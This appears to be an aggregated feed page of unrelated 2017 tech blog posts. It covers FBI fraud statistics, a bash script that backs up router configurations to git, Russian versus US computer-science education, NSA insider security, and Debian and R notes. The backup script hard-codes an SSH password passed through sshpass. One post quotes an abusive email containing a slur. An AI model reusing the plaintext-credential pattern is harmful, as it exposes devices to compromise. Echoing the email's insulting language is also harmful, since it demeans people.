The report notes that only an estimated 15 percent of the nation’s fraud victims report their crimes to law enforcement. For 2016, 298,728 complaints were received, with a total victim loss of $1.33 billion.

If that 15 percent estimate is close to accurate, that means the real cost of cyber fraud for Americans last year was probably closer to $9 billion, and the losses from ransomware attacks upwards of $16 million.

The IC3 reports that last year it received slightly more than 12,000 complaints about CEO fraud attacks — e-mail scams in which the attacker spoofs the boss and tricks an employee at the organization into wiring funds to the fraudster. The fraud-fighting agency said losses from CEO fraud (also known as the “business email compromise” or BEC scam) totaled more than $360 million.

Applying that same 15 percent rule, that brings the likely actual losses from CEO fraud schemes to around $2.4 billion last year.
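The back-of-the-envelope extrapolation above is easy to check with a short script. This is just a sketch of the arithmetic: the dollar figures are the IC3 numbers quoted in this post, and the 15 percent reporting rate is the FBI's own estimate.

```shell
# Sketch of the 15-percent extrapolation used above.
# Reported figures are in millions of dollars, from the IC3 numbers quoted here.
awk -v total=1330 -v ransom=2.4 -v bec=360 -v rate=0.15 'BEGIN {
	printf "implied total losses:      $%.1f billion\n", total / rate / 1000
	printf "implied ransomware losses: $%.0f million\n",  ransom / rate
	printf "implied BEC losses:        $%.1f billion\n", bec / rate / 1000
}'
```

Dividing each reported figure by the estimated reporting rate reproduces the roughly $9 billion, $16 million and $2.4 billion totals discussed above.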

Some 10,850 businesses and consumers reported being targeted by tech support scams last year, with the total reported loss at around $7.8 million. Perhaps unsurprisingly, the IC3 report observed that victims in older age groups reported the highest losses.

Many other, more established types of Internet crimes — such as romance scams and advanced fee fraud — earned top rankings in the report. Check out the full report here (PDF). The FBI urges all victims of computer crimes to report the incidents at IC3.gov. The IC3 unit is part of the FBI’s Cyber Operations Section, and it uses the reports to compile and refer cases for investigation and prosecution.

Source: IC3

Worse Than FailureError'd: Perfectly Logical

"Outlook can't open an attachment because it claims that it was made in Outlook, which Outlook doesn't think is installed...or something," writes Gavin.

 

Mitch wrote, "So, the problems I'm having with activating Windows 10 is that I need to install Windows 10. Of course!"

 

"I don't expect 2018 to come around," writes Adam K., "Instead we'll all be transported back to 2014!"

 

"Here I thought that the world had gone mad, but then I remembered that I had a currency converter add-on installed," writes Shahim M.

 

John S. wrote, "It's good to know that the important notices are getting priority!"

 

Michael D. wrote, "It's all fun and games until someone tries to exit the conference room while someone else is quenching their thirst."

 

Planet DebianArturo Borrero González: Backup router/switch configuration to a git repository

Most routers/switches out there store their configuration in plain text, which is nice for backups. I’m talking about Cisco, Juniper, HPE, etc. The configuration of our routers is changed several times a day by the operators, and we lacked a proper way of tracking these changes.

Some of these routers come with their own mechanisms for doing backups, and depending on the model and version perhaps they include changes-tracking mechanisms as well. However, they mostly don’t integrate well into our preferred version control system, which is git.

After some internet searching, I found rancid, which is a suite for doing tasks like this. But it seemed rather complex and feature-rich for what we required: simply fetching the plain-text config and putting it into a git repo.

It’s worth noting that the most important drawback of not triggering the change-tracking from the router/switch itself is that we have to follow a polling approach: logging into each device, fetching the plain-text config and then committing it to the repo (if changes are detected). This can be hooked into cron, but as I said, we lose the synchronous behaviour and won’t see any changes until the next cron run.

In most cases, we lose authorship information as well, but that is not important for us right now. In the future this is something we will have to solve.

Also, some routers/switches lack basic SSH security improvements, like public-key authentication, so we end up having to hard-code user/pass in our worker script.

Since we have several devices of the same type, we just iterate over their names.

For example, this is what we use for hp comware devices:

#!/bin/bash
# run this script by cron

USER="git"
PASSWORD="readonlyuser"
DEVICES="device1 device2 device3 device4"

FILE="flash:/startup.cfg"
GIT_DIR="myrepo"
GIT="/srv/git/${GIT_DIR}.git"

TMP_DIR="$(mktemp -d)"
if [ -z "$TMP_DIR" ] ; then
	echo "E: no temp dir created" >&2
	exit 1
fi

GIT_BIN="$(which git)"
if [ ! -x "$GIT_BIN" ] ; then
	echo "E: no git binary" >&2
	exit 1
fi

SCP_BIN="$(which scp)"
if [ ! -x "$SCP_BIN" ] ; then
	echo "E: no scp binary" >&2
	exit 1
fi

SSHPASS_BIN="$(which sshpass)"
if [ ! -x "$SSHPASS_BIN" ] ; then
	echo "E: no sshpass binary" >&2
	exit 1
fi

# clone git repo
cd $TMP_DIR
$GIT_BIN clone $GIT
cd $GIT_DIR

for device in $DEVICES; do
	mkdir -p $device
	cd $device

	# fetch cfg
	CONN="${USER}@${device}"
	$SSHPASS_BIN -p "$PASSWORD" $SCP_BIN ${CONN}:${FILE} .

	# commit
	$GIT_BIN add -A .
	$GIT_BIN commit -m "${device}: configuration change" \
		-m "A configuration change was detected" \
		--author="cron <cron@example.com>"

	$GIT_BIN push -f
	cd ..
done

# cleanup
rm -rf $TMP_DIR
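As the script header notes, this is meant to be driven by cron. A hypothetical crontab entry (the script path and polling interval are assumptions for the example) could look like:

```shell
# Illustrative crontab entry: poll all devices every 15 minutes.
# The path to the script above is an assumption for this example.
*/15 * * * *    /usr/local/bin/router-config-backup.sh >/dev/null 2>&1
```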

You should create a read-only user ‘git’ on the devices. And beware that each device model stores the config file in a different place.

For reference, in HP comware, the file to scp is flash:/startup.cfg. And you might try creating the user like this:

local-user git class manage
 password hash xxxxx
 service-type ssh
 authorization-attribute user-role security-audit
#

In Junos/Juniper, the file you should scp is /config/juniper.conf.gz and the script should gunzip the data before committing. For the read-only user, try something like this:

system {
	[...]
	login {
		[...]
		class git {
			permissions maintenance;
			allow-commands scp.*;
		}
		user git {
			uid xxx;
			class git;
			authentication {
				encrypted-password "xxx";
			}
		}
	}
}
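Adapting the loop above for Junos is mostly a matter of fetching the compressed file and decompressing it before the commit. A minimal sketch, assuming the same sshpass/scp approach as the HP script and an illustrative device name:

```shell
# Hedged sketch of the Junos variant of the fetch step; the device name and
# repo layout are assumptions. Junos serves the config gzip-compressed, so
# decompress it so that git tracks (and diffs) plain text.
device="junos-device1"
sshpass -p "$PASSWORD" scp "git@${device}:/config/juniper.conf.gz" .
gunzip -f juniper.conf.gz    # leaves plain-text juniper.conf in place

git add -A .
git commit -m "${device}: configuration change" \
	--author="cron <cron@example.com>"
```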

The file to scp in HP procurve is /cfg/startup-config. And for the read-only user, try something like this:

aaa authorization group "git user" 1 match-command "scp.*" permit
aaa authentication local-user "git" group "git user" password sha1 "xxxxx"

What would be the ideal situation? Get the device controlled directly by git (i.e. commit –> git hook –> device update) or at least have the device to commit the changes by itself to git. I’m open to suggestions :-)

Don MartiFun with dlvr.it

Check it out—I'm "on Facebook" again. Just fixed my gateway through dlvr.it. If you're reading this on Facebook, that's why.

Dlvr.it is a nifty service that will post to social sites from an RSS feed. If you don't run your own linklog feed, the good news is that Pocket will generate RSS feeds from the articles you save, so if you want to share links with people still on Facebook, the combination of Pocket and dlvr.it makes that easy to do without actually spending human eyeball time there.

There's a story about Thomas Nelson, Jr., leader of the Virginia Militia in the Revolutionary War.

During the siege and battle Nelson led the Virginia Militia whom he had personally organized and supplied with his own funds. Legend had it that Nelson ordered his artillery to direct their fire on his own house which was occupied by Cornwallis, offering five guineas to the first man who hit the house.

Would Facebook's owners do the same, now that we know that foreign interests use Facebook to subvert America? Probably not. The Nelson story is just an unconfirmed patriotic anecdote, and we can't expect that kind of thing from today's post-patriotic investor class. Anyway, just seeing if I can move Facebook's bots/eyeballs ratio up a little.

,

Planet DebianSteve McIntyre: -1, Trolling

Here's a nice comment I received by email this morning. I guess somebody was upset by my last post?

From: Tec Services <tecservices911@gmail.com>
Date: Wed, 21 Jun 2017 22:30:26 -0700
To: steve@einval.com
Subject: its time for you to retire from debian...unbelievable..your
         the quality guy and fucked up the installer!

i cant ever remember in the hostory of computing someone releasing an installer
that does not work!!

wtf!!!

you need to be retired...due to being retarded..

and that this was dedicated to ian...what a
disaster..you should be ashames..he is probably roling in his grave from shame
right now....

It's nice to be appreciated.

Planet Linux AustraliaChris Neugebauer: Hire me!

tl;dr: I’ve recently moved to the San Francisco Bay Area and received my US Work Authorization, so now I’m looking for somewhere to work. I have a résumé and an e-mail address!

I’ve worked a lot in Free and Open Source Software communities over the last five years, both in Australia and overseas. While much of my focus has been on the Python community, I’ve also worked more broadly in the Open Source world. I’ve been doing this community work entirely as a volunteer, most of the time working in full-time software engineering jobs which haven’t related to my work in the Open Source world.

It’s pretty clear that I want to move into a job where I can use the skills I’ve been volunteering for the last few years, and put them to good use both for my company, and for the communities I serve.

What I’m interested in doing fits best into a developer advocacy or community management sort of role. Working full-time on helping people in tech be better at what they do would be just wonderful. That said, my background is in code, and working in software engineering with a like-minded company would also be pretty exciting (better still if I get to write a lot of Python).

  • Something with a strong developer relations element. I enjoy working with other developers, and I love having the opportunity to get them excited about things that I’m excited about. As a conference organiser, I’m very aware of the line between terrible marketing shilling, and genuine advocacy by and for developers: I want to help whoever I work for end up on the right side of that line.
  • Either in San Francisco, North of San Francisco, or Remote-Friendly. I live in Petaluma, a lovely town about 50 minutes north of San Francisco, with my wonderful partner, Josh. We’re pretty happy up here, but I’m happy to regularly commute as far as San Francisco. I’ll consider opportunities in other cities, but they’d need to primarily be remote.
  • Relevant to Open Source. The Open Source world is where my experience is, it’s where I know people, and it’s the world where I can be most credible. This doesn’t mean I need to be working on open source itself, but I’d love to be able to show up at OSCON or linux.conf.au and be excited to have my company’s name on my badge.

Why would I be good at this? I’ve been working on building and interacting with communities of developers, especially in the Free and Open Source Software world, for the last five years.

You can find a complete list of what I’ve done in my résumé, but here’s a selection of what I think’s notable:

  • Co-organised two editions of PyCon Australia, and led the linux.conf.au 2017 team. I’ve led PyCon AU from inception, to bidding, to successful execution two years in a row. As the public face of PyCon AU, I made sure that the conference had the right people interested in speaking, and that many from the Australian Python community were interested in attending. I took what I learned at PyCon AU and applied it to run linux.conf.au 2017, where our CFP attracted its largest ever response (beating the previous record by more than 30%).
  • Developed Registrasion, an open source conference ticket system. I designed and developed a ticket sales system that allowed for automation of the most significant time sinks that linux.conf.au and PyCon Australia registration staff had experienced in previous years. Registrasion was Open Sourced, and several other conferences are considering adopting it.
  • Given talks at countless open source and developer events, both in Australia, and overseas. I’ve presented at OSCON, PyCons in five countries, and myriad other conferences. I’ve presented on a whole lot of technical topics, and I’ve recently started talking more about the community-level projects I’ve been involved with.
  • Designed, ran, and grew PyCon Australia’s outreach and inclusion programmes. Each year, PyCon Australia has offered upwards of $10,000 (around 10% of conference budget) in grants to people who otherwise wouldn’t be able to attend the conference: this is not just speakers, but people whose presence would improve the conference just by being there. I’ve led a team to assess applications for these grants, and lead our outreach efforts to make sure we find the right people to receive these grants.
  • Served as a council member for Linux Australia. Linux Australia is the peak body for Open Source communities in Australia, as well as underwriting the region’s more popular Open Source and Developer conferences. In particular, I led a project to design governance policies to help make sure the conferences we underwrite are properly budgeted and planned.

So, if you know of anything going at the moment, I’d love to hear about it. I’m reachable by e-mail (mail@chrisjrn.com) but you can also find me on Twitter (@chrisjrn), or if you really need to, LinkedIn.

TEDAn updated design for TED Talks

It’s been a few years since the TED Talks video page was last updated, but a new design begins rolling out this week. The update aims to provide a simple, straightforward viewing experience for you while surfacing other ideas worth spreading that you might also like.

A few changes to highlight …

More talks to watch

Today there are about 2,500 TED Talks in the catalog, and each is unique. However, most of them are connected to other talks in some way — on similar topics, or given by the same speaker. Think of it as part of a conversation. That’s why, in our new design, it’s easier to see other talks you might be interested in. Those smart recommendations are shown along the right side of the screen.

As our library of talks grows, the updated design will help you discover the most relevant talks.

Beyond the video: More brain candy

Most ideas are rich in nuanced information far beyond what an 18-minute talk can contain. That’s why we collected deeper content around the idea for you to explore — like books by the speaker, articles relating to the talk, and ways to take action and get involved — in the Details section.

Many speakers provide annotations for viewers (now with clickable time codes that take you right to the relevant moment in the video) as well as their own resources and personal recommendations. You can find all of that extra content in the Footnotes and Reading list sections.

Transcripts, translations, and subtitling

Reaching a global community has always been a foundation of TED’s mission, so working to improve the experience for our non-English speaking viewers is an ongoing effort. This update gives you one-click access to our most requested subtitles (when available), displayed in their native endonyms. We’ve also improved the subtitles themselves, making the text easier for you to read across languages.

What’s next?

While there are strong visual differences, this update is just one step in a series of improvements we plan to make to how you view TED Talks on TED.com. We’d appreciate your feedback to measure our progress and influence our future changes!


LongNowThe Nuclear Bunker Preserving Movie History

During the Cold War, this underground bunker in Culpeper, Virginia was where the government would have taken the president if a nuclear war broke out. Now, the Library of Congress is using it to preserve all manner of films, from Casablanca to Harry Potter. The oldest films were made on nitrate, a fragile and highly combustible film base that shares the same chemical compound as gunpowder. Great Big Story takes us inside the vault, and introduces us to archivist George Willeman, the man in charge of restoring and preserving the earliest (and most incendiary) motion pictures.

Krebs on SecurityWhy So Many Top Hackers Hail from Russia

Conventional wisdom says one reason so many hackers seem to hail from Russia and parts of the former Soviet Union is that these countries have traditionally placed much greater emphasis on teaching information technology in middle and high schools than educational institutions in the West have, and yet they lack a Silicon Valley-like pipeline to help talented IT experts channel their skills into high-paying jobs. This post explores the first part of that assumption by examining a breadth of open-source data.

The supply side of that conventional wisdom seems to be supported by an analysis of educational data from both the U.S. and Russia, which indicates there are several stark and important differences between how American students are taught and tested on IT subjects versus their counterparts in Eastern Europe.

Compared to the United States there are quite a few more high school students in Russia who choose to specialize in information technology subjects. One way to measure this is to look at the number of high school students in the two countries who opt to take the advanced placement exam for computer science.

According to an analysis (PDF) by The College Board, in the ten years between 2005 and 2016 a total of 270,000 high school students in the United States opted to take the national exam in computer science (the “Computer Science Advanced Placement” exam).

Compare that to the numbers from Russia: A 2014 study (PDF) on computer science (called “Informatics” in Russia) by the Perm State National Research University found that roughly 60,000 Russian students register each year to take their nation’s equivalent to the AP exam — known as the “Unified National Examination.” Extrapolating that annual 60,000 number over ten years suggests that more than twice as many people in Russia — 600,000 — have taken the computer science exam at the high school level over the past decade.

In “A National Talent Strategy,” an in-depth analysis from Microsoft Corp. on the outlook for information technology careers, the authors warn that despite its critical and growing importance, computer science is taught in only a small minority of U.S. schools. The Microsoft study notes that although there currently are just over 42,000 high schools in the United States, only 2,100 of them were certified to teach the AP computer science course in 2011.

A HEAD START

If more people in Russia than in America decide to take the computer science exam in secondary school, it may be because Russian students are required to study the subject beginning at a much younger age. Russia’s Federal Educational Standards (FES) mandate that informatics be compulsory in middle school, with any school free to choose to include it in their high school curriculum at a basic or advanced level.

“In elementary school, elements of Informatics are taught within the core subjects ‘Mathematics’ and ‘Technology,’” the Perm University research paper notes. “Furthermore, each elementary school has the right to make [the] subject “Informatics” part of its curriculum.”

The core components of the FES informatics curriculum for Russian middle schools are the following:

1. Theoretical foundations
2. Principles of computer’s functioning
3. Information technologies
4. Network technologies
5. Algorithmization
6. Languages and methods of programming
7. Modeling
8. Informatics and Society

SECONDARY SCHOOL

There also are stark differences in how computer science/informatics is taught in the two countries, as well as the level of mastery that exam-takers are expected to demonstrate in their respective exams.

Again, drawing from the Perm study on the objectives in Russia’s informatics exam, here’s a rundown of what that exam seeks to test:

Block 1: “Mathematical foundations of Informatics”,
Block 2: “Algorithmization and programming”, and
Block 3: “Information and computer technology.”

The testing materials consist of three parts.

Part 1 is a multiple-choice test with four given options, and it covers all the blocks. Relatively little time is set aside to complete this part.

Part 2 contains a set of tasks of basic, intermediate and advanced levels of complexity. These require brief answers such as a number or a sequence of characteristics.

Part 3 contains a set of tasks of an even higher level of complexity than advanced. These tasks usually involve writing a detailed answer in free form.

According to the Perm study, “in 2012, part 1 contained 13 tasks; Part 2, 15 tasks; and Part 3, 4 tasks. The examination covers the key topics from the Informatics school syllabus. The tasks with detailed answers are the most labor intensive. These include tasks on the analysis of algorithms, drawing up computer programs, among other types. The answers are checked by the experts of regional examination boards based on standard assessment criteria.”

Image: Perm State National Research University, Russia.

In the U.S., the content of the AP computer science exam is spelled out in this College Board document (PDF).

US Test Content Areas:

Computational Thinking Practices (P)

P1: Connecting Computing
P2: Creating Computational Artifacts
P3: Abstracting
P4: Analyzing Problems and Artifacts
P5: Communicating
P6: Collaborating

The Concept Outline:

Big Idea 1: Creativity
Big idea 2: Abstraction
Big Idea 3: Data and Information
Big Idea 4: Algorithms
Big idea 5: Programming
Big idea 6: The Internet
Big idea 7: Global Impact

ADMIRING THE PROBLEM

How do these two tests compare? Alan Paller, director of research for the SANS Institute — an information security education and training organization — says topics 2, 3, 4 and 6 in the Russian informatics curriculum above are the “basics” on which cybersecurity skills can be built, and they are present beginning in middle school for all Russian students.

“Very few middle schools teach this in the United States,” Paller said. “We don’t teach these topics in general and we definitely don’t test them. The Russians do and they’ve been doing this for the past 30 years. Which country will produce the most skilled cybersecurity people?”

Paller said the Russian curriculum virtually ensures kids have far more hands-on experience with computer programming and problem solving. For example, in the American AP test no programming language is specified and the learning objectives are:

“How are programs developed to help people and organizations?”
“How are programs used for creative expression?”
“How do computer programs implement algorithms?”
“How does abstraction make the development of computer programs possible?”
“How do people develop and test computer programs?”
“Which mathematical and logical concepts are fundamental to programming?”

“Notice there is almost no need to learn to program — I think they have to write one program (in collaboration with other students),” Paller wrote in an email to KrebsOnSecurity. “It’s like they’re teaching kids to admire it without learning to do it. The main reason that cyber education fails is that much of the time the students come out of school with almost no usable skills.”

THE WAY FORWARD

On the bright side, there are signs that computer science is becoming a more popular focus for U.S. high school students. According to the latest AP Test report (PDF) from the College Board, almost 58,000 Americans took the AP exam in computer science last year — up from 49,000 in 2015.

However, computer science still is far less popular than most other AP test subjects in the United States. More than a half million students opted for the English AP exam in 2016; 405,000 took English literature; almost 283,000 took AP government, while some 159,000 students went for an AP test called “Human Geography.”

A breakdown of subject specialization in the 2016 v. 2015 AP tests in the United States. Source: The College Board.

This is not particularly good news given the dearth of qualified cybersecurity professionals available to employers. ISACA, a non-profit information security advocacy group, estimates there will be a global shortage of two million cyber security professionals by 2019. A report from Frost & Sullivan and (ISC)2 prognosticates there will be more than 1.5 million cybersecurity jobs unfilled by 2020.

The IT recruitment problem is especially acute for companies in the United States. Unable to find enough qualified cybersecurity professionals to hire here in the U.S., companies increasingly are counting on hiring foreigners who have the skills they’re seeking. However, the Trump administration in April ordered a full review of the country’s high-skilled immigration visa program, a step that many believe could produce new rules to clamp down on companies that hire foreigners instead of Americans.

Some of Silicon Valley’s biggest players are urging policymakers to adopt a more forward-looking strategy to solving the skills gap crisis domestically. In its National Talent Strategy report (PDF), Microsoft said it spends 83 percent of its worldwide R&D budget in the United States.

“But companies across our industry cannot continue to focus R&D jobs in this country if we cannot fill them here,” reads the Microsoft report. “Unless the situation changes, there is a growing probability that unfilled jobs will migrate over time to countries that graduate larger numbers of individuals with the STEM backgrounds that the global economy so clearly needs.”

Microsoft is urging U.S. policymakers to adopt a nationwide program to strengthen K-12 STEM education by recruiting and training more teachers to teach it. The software giant also says states should be given more funding to broaden access to computer science in high school, and that computer science learning needs to start much earlier for U.S. students.

“In the short-term this represents an unrealized opportunity for American job growth,” Microsoft warned. “In the longer term this may spur the development of economic competition in a field that the United States pioneered.”

Planet DebianJohn Goerzen: First Experiences with Stretch

I’ve done my first upgrades to Debian stretch at this point. The results have been overall good. On the laptop my kids use, I helped my 10-year-old do it, and it worked flawlessly. On my workstation, I got a kernel panic on boot. Hmm.

Unfortunately, my system has to use the nv drivers, which leaves me with an 80×25 text console. It took some finagling (break=init in grub, then manually insmoding the appropriate stuff based on modules.dep for nouveau), but finally I got a console so I could see what was breaking. It appeared that init was crashing because it couldn’t find liblz4. A little digging shows that liblz4 is in /usr, and /usr wasn’t mounted. I’ve filed the bug on systemd-sysv for this.

I run root on ZFS, and further digging revealed that I had datasets named like this:

  • tank/hostname-1/ROOT
  • tank/hostname-1/usr
  • tank/hostname-1/var

This used to be fine. The mountpoint property of the usr dataset put it at /usr without incident. But it turns out that this won’t work now, unless I set ZFS_INITRD_ADDITIONAL_DATASETS in /etc/default/zfs for some reason. So I renamed them so usr was under ROOT, and then the system booted.
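For reference, the rename amounts to something like the following. This is a hedged sketch using the illustrative dataset names above; exact mountpoint handling may differ on your pool, so verify before rebooting.

```shell
# Sketch: move usr and var under ROOT so the stretch initramfs mounts them
# automatically, instead of relying on ZFS_INITRD_ADDITIONAL_DATASETS in
# /etc/default/zfs. Dataset names are the illustrative ones from this post.
zfs rename tank/hostname-1/usr tank/hostname-1/ROOT/usr
zfs rename tank/hostname-1/var tank/hostname-1/ROOT/var

# Verify the mountpoint properties still resolve to /usr and /var.
zfs get mountpoint tank/hostname-1/ROOT/usr tank/hostname-1/ROOT/var
```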

Then I ran into samba not liking something in my bind interfaces line (to be fair, it did still say eth0 instead of br0). rpcbind was failing in postinst, though a reboot seems to have helped that. More annoying was that I had trouble logging into my system because resolv.conf was left empty (despite dns-* entries in /etc/network/interfaces and the presence of resolvconf). I eventually repaired that, and found that it kept removing my “search” line. Eventually I removed resolvconf.

Then mariadb’s postinst was silently failing. I eventually discovered it was sending info to syslog (odd), and /etc/init.d/apparmor teardown let it complete properly. It seems like there may have been an outdated /etc/apparmor.d/cache/usr.sbin.mysql out there for some reason.

Then there was XFCE. I use it with xmonad, and the session startup was really wonky. I had to zap my sessions, my panel config, etc. and start anew. I am still not entirely sure I have it right, but at least I have a usable system now.

Planet DebianDirk Eddelbuettel: nanotime 0.2.0

A new version of the nanotime package for working with nanosecond timestamps just arrived on CRAN.

nanotime uses the RcppCCTZ package for (efficient) high(er) resolution time parsing and formatting up to nanosecond resolution, and the bit64 package for the actual integer64 arithmetic.

Thanks to a metric ton of work by Leonardo Silvestri, the package now uses S4 classes internally allowing for greater consistency of operations on nanotime objects.

Changes in version 0.2.0 (2017-06-22)

  • Rewritten in S4 to provide more robust operations (#17 by Leonardo)

  • Ensure tz="" is treated as unset (Leonardo in #20)

  • Added format and tz arguments to nanotime, format, print (#22 by Leonardo and Dirk)

  • Ensure printing respects options()$max.print, ensure names are kept with the vector (#23 by Leonardo)

  • Correct summary() by defining names<- (Leonardo in #25 fixing #24)

  • Report an error on operations that are not meaningful for the type; handle NA, NaN, Inf, -Inf correctly (Leonardo in #27 fixing #26)

We also have a diff to the previous version thanks to CRANberries. More details and examples are at the nanotime page; code, issue tickets etc at the GitHub repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Cryptogram: NSA Insider Security Post-Snowden

According to a recently declassified report obtained under FOIA, the NSA's attempts to protect itself against insider attacks aren't going very well:

The N.S.A. failed to consistently lock racks of servers storing highly classified data and to secure data center machine rooms, according to the report, an investigation by the Defense Department's inspector general completed in 2016.

[...]

The agency also failed to meaningfully reduce the number of officials and contractors who were empowered to download and transfer data classified as top secret, as well as the number of "privileged" users, who have greater power to access the N.S.A.'s most sensitive computer systems. And it did not fully implement software to monitor what those users were doing.

In all, the report concluded, while the post-Snowden initiative -- called "Secure the Net" by the N.S.A. -- had some successes, it "did not fully meet the intent of decreasing the risk of insider threats to N.S.A. operations and the ability of insiders to exfiltrate data."

Marcy Wheeler comments:

The IG report examined seven of the most important out of 40 "Secure the Net" initiatives rolled out since Snowden began leaking classified information. Two of the initiatives aspired to reduce the number of people who had the kind of access Snowden did: those who have privileged access to maintain, configure, and operate the NSA's computer systems (what the report calls PRIVACs), and those who are authorized to use removable media to transfer data to or from an NSA system (what the report calls DTAs).

But when DOD's inspectors went to assess whether NSA had succeeded in doing this, they found something disturbing. In both cases, the NSA did not have solid documentation about how many such users existed at the time of the Snowden leak. With respect to PRIVACs, in June 2013 (the start of the Snowden leak), "NSA officials stated that they used a manually kept spreadsheet, which they no longer had, to identify the initial number of privileged users." The report offered no explanation for how NSA came to no longer have that spreadsheet just as an investigation into the biggest breach thus far at NSA started. With respect to DTAs, "NSA did not know how many DTAs it had because the manually kept list was corrupted during the months leading up to the security breach."

There seem to be two possible explanations for the fact that the NSA couldn't track who had the same kind of access that Snowden exploited to steal so many documents. Either the dog ate their homework: Someone at NSA made the documents unavailable (or they never really existed). Or someone fed the dog their homework: Some adversary made these lists unusable. The former would suggest the NSA had something to hide as it prepared to explain why Snowden had been able to walk away with NSA's crown jewels. The latter would suggest that someone deliberately obscured who else in the building might walk away with the crown jewels. Obscuring that list would be of particular value if you were a foreign adversary planning on walking away with a bunch of files, such as the set of hacking tools the Shadow Brokers have since released, which are believed to have originated at NSA.

Read the whole thing. Securing against insiders, especially those with technical access, is difficult, but I had assumed the NSA did more post-Snowden.

Worse Than Failure: I Need More Space

Beach litter, Winterton Dunes - geograph.org.uk - 966905

Shawn W. was a newbie support tech at a small company. Just as he was beginning to familiarize himself with its operational quirks, he got a call from Jim: The Big Boss.

Dread seized Shawn. Aside from a handshake on Interview Day, the only "interaction" he'd had with Jim thus far was overhearing him tear into a different support rep about having to deal with "complicated computer crap" like changing passwords. No doubt, this call was bound to be a clinic in saintly patience.

"Tech Support," Shawn greeted. "How may—?"

"I'm out of space and I need more!" Jim barked over the line.

"Oh." Shawn mentally geared up for a memory or hard drive problem. "Did you get a warning or error mes—?"

"Just get up here and bring some more space with you!" Jim hung up.

"Oh, boy," Shawn muttered to himself.

Deciding that he was better off diagnosing the problem firsthand, Shawn trudged upstairs to Jim's office. To his pleasant surprise, he found it empty. He sank into the cushy executive-level chair. Jim hadn't been away long enough for any screensavers or lock screens to pop up, so Shawn had free rein to examine the machine.

There wasn't much to find. The only program running was a web browser, with a couple of tabs open to ESPN.com and an investment portfolio. The hardware itself was fairly new. CPU, memory, hard drive all looked fine.

"See, I'm out of space. Did you bring me more?"

Shawn glanced up to find Jim barreling toward him, steaming mug of coffee in hand. He braced himself as though facing down an oncoming freight train. "I'm not sure I see the problem yet. Can you show me what you were doing when you noticed you needed more space?"

Jim elbowed his way over to the mouse, closed the browser, then pointed to the monitor. "There! Can't you see I'm out of space?"

Indeed, Jim's desktop was full. So many shortcuts, documents, widgets, and other icons crowded the screen that the tropical desktop background was barely recognizable as such.

While staring at what resembled the aftermath of a Category 5 hurricane, Shawn debated his response. "OK, I see what you mean. Let's see if we can—"

"Can't you just get me more screen?" Jim pressed.

More screen? "You mean another monitor?" Shawn asked. "Well, yes, I could add a second monitor if you want one, but we could also organize your desktop a little and—"

"Good, get me one of those! Don't touch my icons!" Jim shooed Shawn away like so much lint. "Get out of my chair so I can get back to work."

A short while later, Shawn hooked up a second monitor to Jim's computer. This prompted a huge and unexpected grin from the boss. "I like you, you get things done. Those other guys would've taken a week to get me more space!"

Shawn nodded while stifling a snort. "Let me know if you need anything else."

Once Jim had left for the day, Shawn swung past the boss' office out of morbid curiosity. Jim had already scattered a few dozen shortcuts across his new real estate. Another lovely vacation destination was about to endure a serious littering problem.


Planet Debian: Norbert Preining: Signal handling in R

Recently I have been programming quite a lot in R, and today stumbled over the problem of implementing a kind of monitoring loop in R. Typically that would be an infinite loop with sleep calls, but I wanted to allow for waking up from the sleep via sending UNIX-style signals, in particular SIGINT. After some searching I found Beyond Exception Handling: Conditions and Restarts from the Advanced R book. But it didn’t really help me a lot to program an interrupt handler.

My requirements were:

  • an interruption of the work-part should be immediately restarted
  • an interruption of the sleep-part should go immediately into the work-part

Unfortunately it seems not to be possible to ignore interrupts at all from within the R code. The best one can do is install interrupt handlers and try to repeat the code which was being executed when the interrupt happened. This is what I tried to implement with the code below. I still have to digest the documentation about conditions and restarts, and play around a lot, but at least this is an initial working version.

workfun <- function() {
  i <- 1
  do_repeat <- FALSE
  while (TRUE) {
    message("begin of the loop")
    withRestarts(
      {
        # do all the work here
        cat("Entering work part i =", i, "\n");
        Sys.sleep(10)
        i <- i + 1
        cat("finished work part\n")
      }, 
      gotSIG = function() { 
        message("interrupted while working, restarting work part")
        do_repeat <<- TRUE
        NULL
      }
    )
    if (do_repeat) {
      cat("restarting work loop\n")
      do_repeat <- FALSE
      next
    } else {
      cat("between work and sleep part\n")
    }
    withRestarts(
      {
        # do the sleep part here
        cat("Entering sleep part i =", i, "\n")
        Sys.sleep(10)
        i <- i + 1
        cat("finished sleep part\n")
      }, 
      gotSIG = function() {
        message("got work to do, waking up!")
        NULL
      }
    )
    message("end of the loop")
  }
}

cat("Current process:", Sys.getpid(), "\n");

withCallingHandlers({
    workfun()
  },
  interrupt = function(e) {
    invokeRestart("gotSIG")
  })

While not perfect, I guess I have to live with this method for now.

Cryptogram: Ceramic Knife Used in Israel Stabbing

I have no comment on the politics of this stabbing attack, and only note that the attacker used a ceramic knife -- that will go through metal detectors.

I have used a ceramic knife in the kitchen. It's sharp.

EDITED TO ADD (6/22): It looks like the knife had nothing to do with the attack discussed in the article.

Don Marti: Stuff I'm thankful for

I'm thankful that the sewing machine was invented a long time ago, not today. If the sewing machine were invented today, most sewing tutorials would be twice as long, because all the thread would come in proprietary cartridges, and you would usually have to hack the cartridge to get the type of thread you need in a cartridge that works with your machine.

Don Marti: 1. Write open source. 2. ??? 3. PROFIT

Studies keep showing that open source developers get paid more than people who develop software but do not contribute to open source.

Good recent piece: Tabs, spaces and your salary - how is it really? by Evelina Gabasova.

But why?

Is open source participation a way to signal that you have skills and are capable of cooperation with others?

Is open source a way to build connections and social capital so that you have more awareness of new job openings and can more easily move to a higher-paid position?

Does open source participation just increase your skills so that you do better work and get paid more for it?

Are open source codebases a complementary good to open source maintenance programming, so that a lower price for access to the codebase tends to drive up the price for maintenance programming labor?

Is "we hire open source people" just an excuse for bias, since the open source scene at least in the USA is less diverse than the general pool of programming job applicants?

Planet Debian: Dirk Eddelbuettel: RcppCCTZ 0.2.3 (and 0.2.2)

A new minor version 0.2.3 of RcppCCTZ is now on CRAN.

RcppCCTZ uses Rcpp to bring CCTZ to R. CCTZ is a C++ library for translating between absolute and civil times using the rules of a time zone. In fact, it is two libraries: one for dealing with civil time (human-readable dates and times) and one for converting between absolute and civil times via time zones. The RcppCCTZ page has a few usage examples and details.

This version ensures that we set the TZDIR environment variable correctly on the old dreaded OS that does not come with proper timezone information---an issue which had come up while preparing the next (and awesome, trust me) release of nanotime. It also appears that I failed to blog about 0.2.2, another maintenance release, so changes for both are summarised next.

Changes in version 0.2.3 (2017-06-19)

  • On Windows, the TZDIR environment variable is now set in .onLoad()

